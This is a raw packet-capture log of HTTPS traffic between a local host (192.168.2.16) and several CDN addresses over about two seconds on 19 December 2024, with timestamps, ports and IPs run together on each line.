                                                                                                                  Dec 19, 2024 11:42:54.578850031 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.587869883 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.587984085 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.587995052 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.596350908 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.596422911 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.596431017 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.650717974 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.650729895 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.658494949 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.658845901 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:54.658876896 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.660072088 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.660171032 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:54.660542011 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:54.660610914 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.660860062 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:54.660876989 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.698791981 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.698919058 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.713745117 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:54.718417883 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.718733072 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:54.718753099 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.719777107 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.719873905 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:54.720223904 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:54.720283031 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.720323086 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:54.745714903 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.761734009 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:54.761758089 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.770287037 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.773964882 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.774039984 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.774056911 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.774089098 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.774142981 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.781955004 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.789757967 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.789839983 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.789844036 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.789872885 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.789918900 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.797792912 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.805622101 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.805696964 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.805707932 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.809681892 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:54.813399076 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.813493013 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.813503027 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.822526932 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.822601080 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.822633028 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.836998940 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.837064981 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.837074995 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.844072104 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.844147921 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.844163895 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.851252079 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.851368904 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.851383924 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.858511925 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.858572006 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.858587980 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.865245104 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.865323067 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.865362883 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.865386963 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.865555048 CET49723443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.865573883 CET44349723104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.884929895 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.884965897 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.885046959 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.885436058 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:54.885452986 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:54.918694019 CET49673443192.168.2.16204.79.197.203
                                                                                                                  Dec 19, 2024 11:42:55.006759882 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:55.006860018 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.006953955 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:55.007354975 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:55.007390022 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.100349903 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.100403070 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.100436926 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.100493908 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.100492001 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.100550890 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.100585938 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.101008892 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.101067066 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.101083994 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.108225107 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.108297110 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.108319998 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.116522074 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.116588116 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.116604090 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.152976036 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.153189898 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.153254986 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.153278112 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.153304100 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.153354883 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.153382063 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.157699108 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.157716990 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.160903931 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.160974026 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.160989046 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.171257973 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.171335936 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.171346903 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.178016901 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.178090096 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.178100109 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.204665899 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.220685959 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.220699072 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.268671989 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.272839069 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.291696072 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.295600891 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.295679092 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.295705080 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.303570032 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.303648949 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.303664923 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.311165094 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.311228037 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.311242104 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.316684008 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.318928957 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.318985939 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.319001913 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.334496021 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.334602118 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.334661007 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.334678888 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.334733009 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.342350960 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.350393057 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.350419044 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.350459099 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.350476027 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.350534916 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.358100891 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.365771055 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.365866899 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.365881920 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.390202999 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.390229940 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.390247107 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.390291929 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.390311003 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.390574932 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.390589952 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.390645981 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.411714077 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.411731005 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.458969116 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.483788013 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.487689018 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.487771034 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.487771988 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.487812996 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.487864017 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.495531082 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.495661020 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.495718002 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.496748924 CET49724443192.168.2.16104.17.24.14
                                                                                                                  Dec 19, 2024 11:42:55.496783018 CET44349724104.17.24.14192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.536959887 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.536986113 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.537023067 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.537040949 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.537066936 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.537086964 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.537098885 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.537107944 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.537121058 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.537133932 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.537142992 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.537174940 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.566874027 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.566890955 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.566905975 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.566939116 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.566946983 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.566999912 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.567011118 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.567054987 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.597580910 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.597601891 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.597728014 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.597742081 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.597790956 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.610917091 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.610991001 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.610999107 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.611011028 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:55.611078978 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.611390114 CET49725443192.168.2.16151.101.130.137
                                                                                                                  Dec 19, 2024 11:42:55.611409903 CET44349725151.101.130.137192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.097476959 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.097842932 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.097868919 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.098618984 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.098965883 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.099093914 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.099100113 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.140755892 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.140784025 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.216836929 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.217168093 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.217231989 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.218333006 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.218431950 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.218702078 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.218784094 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.218816042 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.263370037 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.268810034 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.268834114 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.316711903 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.539694071 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.540030003 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.540055037 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.540107965 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.540137053 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.540185928 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.540402889 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.547300100 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.547420979 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.547430992 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.555665016 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.555732965 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.555742025 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.560604095 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.560672045 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.560745001 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.560981035 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.560997009 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.564059973 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.564131975 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.564142942 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.621017933 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.659872055 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.659925938 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.660020113 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.660085917 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.660223007 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.660259008 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.660382986 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.660408020 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.660466909 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.660691977 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.667309046 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.667414904 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.667438984 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.682113886 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.682337046 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.682374954 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.730700970 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.731798887 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.734478951 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.734510899 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.734543085 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.734575987 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.734644890 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.740648985 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.748742104 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.748800039 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.748826027 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.756452084 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.756500959 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.756520987 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.764112949 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.764193058 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.764328003 CET49726443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.764345884 CET44349726104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.766119003 CET49729443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.766144991 CET44349729104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.766228914 CET49729443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.766453028 CET49729443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:56.766469002 CET44349729104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.779479027 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.827929020 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.850876093 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.856116056 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.856199980 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.856326103 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.856353998 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.856441021 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.864166021 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.872045994 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.872236967 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.872258902 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.880007982 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.880116940 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.880139112 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.887658119 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.887729883 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.887753010 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.903409004 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.903450012 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.903527021 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.903551102 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.903609037 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.911220074 CET44349727104.18.95.41192.168.2.16
